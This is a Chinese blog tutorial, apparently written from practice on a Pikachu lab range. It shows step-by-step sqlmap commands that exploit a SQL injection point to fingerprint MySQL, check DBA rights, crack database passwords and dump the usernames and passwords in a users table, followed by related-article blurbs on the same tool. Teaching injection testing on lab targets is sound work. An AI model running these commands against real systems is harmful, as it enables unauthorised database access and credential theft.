SQLMAP工具之实战渗透技巧一

已于 2022-02-06 20:14:13 修改
阅读量1.3k 收藏 5
点赞数 1
分类专栏: SQLMAP 文章标签: web安全 渗透测试
于 2022-02-06 20:13:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122801057
版权

文中通过详细讲解SQLMAP工具,更加深入的掌握SQLMAP用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

sqlmap实战渗透技巧一

前篇我们说到,当看到是php,那么我们基本可以确定为mysql数据库和它的组合,同样可以在执行过程中使用–batch来自动交互,不用手动在终端里面进行确认。加上-f这个参数则可以看到数据库的版本。

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -f --batch

在这里插入图片描述

检测当前用户权限

在检测中,我们同样可以加入参数来对当前数据库,当前用户,是否是dba权限,来进行检测:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -f --batch --current-db --current-user --is-dba

在这里插入图片描述

爆破数据库密码

同样我们也可以通过命令来爆破数据库密码:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -f --batch --passwords

在这里插入图片描述

使用命令获取数据库信息

获取所有库:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs

在这里插入图片描述
获取所有库,所有表:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs --tables
sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu --tables  #获取pikachu库的所有表

在这里插入图片描述
获取所有表中的所有字段:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -dbs --tables --columns
sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users --columns #获取某个库某个表的所有字段

在这里插入图片描述
获取字段内容:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users -C "username,password" --dump

在这里插入图片描述
这里同样可以直接使用下面这命令即可把字段内容导出:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users --dump
--count #此参数统计表中有多少条字段。
--start # 开始的条数
--stop #结束的条数

假如我们只需要第二条,则可以从第二条开始,然后第二条结束:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users --dump --flush-session --batch --start 2 --stop 2

在这里插入图片描述

全局变量Global
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | 渗透工具SQLmap精讲(全网最详细图文教程)
等风来
01-06 9319
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | CSDN@秋说本文以目标账号与其它进行讲解。
sqlmap渗透工具
07-06
sqlmap渗透工具,需要python环境,需要相关使用命令可以看我的博客
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4635
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1630
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇_sqlmap靶场
最新发布
2401_84239625的博客
04-20 601
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注软件测试)一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
sqlmap的应用实战
vala0901的博客
05-10 7194
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
sqlmap注入实战教程(图文详解)
热门推荐
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
sqlmap 渗透测试工具
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
sqlmap工具
11-26
sqlmap工具测试sql注入非常方便,使用非常简单。sqlmap漏洞测试。
sqlmap工具2020
02-27
sqlmap是一个工具,一个用来做sql注入攻击的工具。这个sqlmap需要python2才可以正常执行,注意python3不行哦。
mybatis设置全局变量
After 95
10-10 8006
1.在mybatis-config.xml中配置全局变量( 注意顺序,properties是第一个写在configuration中的标签:(properties?,settings?,typeAliases?,typeHandlers?,objectFactory?,objectWrapperFactory?,reflectorFactory?,plugins?,environments?,da
ibatis/mybatis 引用全局变量
nayi_224的博客
04-29 1532
官方文档地址 https://www.mybatis.org/mybatis-3/zh/configuration.html ibatis 编辑文件test.properties testValue=aaaaa 配置文件中加入 <sqlMapConfig> <properties resource="config/test.properties"/> <...
sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码
weixin_36400512的博客
02-06 2686
首先,先简单介绍下sqlmap简介:sqlmap是一种开源的支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询...
MySQL数据库密码破解
dfdhxb995397的博客
11-09 921
研究MySQL数据库的加解密方式,在网络攻防过程中具有重要的意义;试想一旦获取了网站一定的权限后,如果能够获取MySQL中保存用户数据,通过解密后,即可通过正常途径来访问数据库;一方面可以直接操作数据库中的数据,另一方面可以用来提升权限。本文对目前常见的MySQL密码破解方式进行了研究和讨论。 本文作者:simeon 1.MySQL数据库密码破解 MySQL数据库用户密码跟...
利用sqlmap实战学校靶机
qq_45970858的博客
09-10 278
###利用sqlmap实战学校靶机 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击 行为。 产生原因:程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造SQL语句;编写代码时未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句 1、这是我们需要构造语句,使其注入,尝试后面加上“index/narticle.php?nid=3100”,有语句显示,证明注入成功 2、打开sqlmap,开始操作, 将网站丢到sqlmap里面测试能不能注入
sqlmap的使用(基于dvwa的靶场实验)
weixin_66669317的博客
12-07 1083
sqlmap的使用
安全测试学习】基于bWAPP靶场,使用sqlmap实现脱库实战
aovenus的专栏-测试新时代(微信公众号:测试新时代)
11-24 563
基于bWAPP靶场,使用sqlmap实现脱库实战
使用sqlmapsqli-less1注入过程
weixin_44352058的博客
05-02 695
使用sqlmap脚本工具sqli-less1题解 1.检测当前注入点,测试表明GET参数ID可能是可注入型的 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 2. 找出所有的数据库名 sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --dbs 3.查看数据库中的表 sqlmap.py -...
sqlmap工具下载csdn
07-10
### 回答1: 要下载SQLMap工具,可以通过以下步骤在CSDN(中国最大的技术社区)进行下载: 1. 首先,在浏览器中打开CSDN的网站(www.csdn.net)。 2. 在CSDN的主页上,找到网站的搜索栏。在搜索栏中输入“SQLMap工具下载”并点击搜索按钮。 3. 搜索结果页面会显示与SQLMap工具下载相关的文章、教程或资源。 4. 仔细查看搜索结果中的文章标题和描述,并寻找与SQLMap工具下载相关的资源。 5. 选择一个合适的文章或教程链接,点击进入详细页面。 6. 在详细页面中,会提供SQLMap工具下载的相关信息和链接。仔细阅读页面上的说明和指南,以确保你下载到合适版本的SQLMap工具。 7. 一般而言,你可以在页面上找到一个下载按钮或者链接。点击该按钮或链接即可开始下载SQLMap工具。 8. 下载完成后,使用一个合适的解压工具(如WinRAR或7-Zip)解压SQLMap工具的压缩包。 9. 解压后,你就可以开始使用SQLMap工具了。你可以根据自己的需要配置和使用该工具进行SQL注入漏洞的测试和防护。 需要注意的是,在下载任何工具或资源之前,应该确保以安全的方式进行。这包括确保源网站的可信度和文件的完整性,仔细查看任何可能的风险或警告,并根据自己的需求选择适合的版本和来源。 ### 回答2: sqlmap是一种强大的开源工具,用于检测和利用Web应用程序中的SQL注入漏洞。我们可以在CSDN上下载这个工具。 要下载sqlmap工具,我们可以按照以下步骤进行操作。 首先,我们打开浏览器,进入CSDN的官方网站(www.csdn.net)。 在CSDN的主页上,我们可以看到一个搜索栏。在搜索栏中,我们输入"sqlmap"并点击搜索按钮。 搜索结果页面会显示与"sqlmap"相关的内容。我们可以通过筛选器选择合适的结果。 在筛选器中,我们可以选择"工具"类别,以便快速找到sqlmap工具。 点击选择后,页面会刷新,显示与"sqlmap"相关的工具列表。 从列表中,我们可以找到可靠的、由CSDN认证的sqlmap工具。我们可以通过点击工具名称或下载按钮来进一步了解和下载工具。 在工具页面上,我们可以看到关于工具的详细信息,例如介绍、功能、使用方法等。 对于下载工具,我们可以点击页面上的下载按钮。网站可能会提示我们先登录或创建一个CSDN账号。 完成登录或账号创建后,我们可以再次点击下载按钮,此时页面会跳转到下载页面。 在下载页面上,我们可以选择适合我们操作系统的版本,并点击下载按钮。 下载过程可能需要一些时间,这取决于我们的网络状况和服务器响应速度。 下载完成后,我们可以在指定位置找到下载的sqlmap工具。此时,我们可以将它解压缩并执行相关操作。 总结来说,我们可以通过CSDN来下载sqlmap工具。只需要在CSDN网站上搜索sqlmap工具,找到可靠的下载源并进行下载,然后按照需要解压缩和使用它进行相关的SQL注入漏洞检测和利用工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值